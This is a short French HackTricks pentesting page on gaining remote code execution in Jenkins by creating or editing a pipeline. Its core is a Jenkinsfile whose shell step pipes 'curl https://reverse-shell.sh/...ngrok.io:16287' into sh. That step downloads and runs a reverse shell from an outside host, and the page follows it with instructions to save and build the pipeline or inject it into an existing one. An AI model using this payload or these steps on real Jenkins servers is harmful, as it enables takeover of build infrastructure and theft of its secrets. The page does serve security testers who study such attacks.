Jenkins RCE Creating/Modifying Pipeline

Soutenez HackTricks

Créer un nouveau Pipeline

Dans "New Item" (accessible via /view/all/newJob), sélectionnez Pipeline :

Dans la section Pipeline, écrivez le reverse shell :

pipeline {
agent any

stages {
stage('Hello') {
steps {
sh '''
curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh
'''
}
}
}
}

Enfin, cliquez sur Save, puis sur Build Now et le pipeline sera exécuté :

Modifier un Pipeline

Si vous pouvez accéder au fichier de configuration d'un pipeline configuré, vous pouvez simplement le modifier en ajoutant votre reverse shell puis l'exécuter ou attendre qu'il soit exécuté.

Soutenez HackTricks

Last updated